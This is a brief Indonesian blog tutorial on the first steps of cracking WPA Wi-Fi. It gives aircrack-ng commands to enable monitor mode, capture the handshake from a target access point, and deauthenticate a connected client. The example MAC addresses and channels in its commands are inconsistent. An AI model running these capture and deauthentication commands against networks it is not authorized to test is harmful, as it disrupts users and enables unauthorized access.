Menjebol WPA
hampir tidak mungkin. Tapi kalau anda mau memaksa mencoba-nya bisa
mencoba langkah berikut walaupun tidak ada jaminan sama sekali bahwa
anda dapat menjebol-nya.
Misalnya,
BSSID 00:30:4F:4E:2B:50 WIFI 00:11:6b:33:d3:90 CHANNEL 2
Untuk memudahkan operasi ada baiknya melakukan di shell
export AP=00:30:4F:4E:2B:50 export WIFI=00:11:6b:33:d3:90 export CHANNEL=1
Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah
airmon-ng start wlan0 1
Biasanya akan tampil kira-kira sebagai berikut
Interface Chipset Driver wlan0 Intel 3945ABG iwl3945 - [phy0] (monitor mode enabled on mon0)
Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.
airodump-ng -w hasilcapture --bssid $AP --channel $CHANNEL mon0
Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah
airodump-ng --output-format pcap -w hasilcapture --bssid $AP --channel $CHANNEL mon0
Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..
Untuk mempercepat proses gunakan aireplay-ng
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
Dimana
-a MAC AP -c MAC client
Tidak ada komentar:
Posting Komentar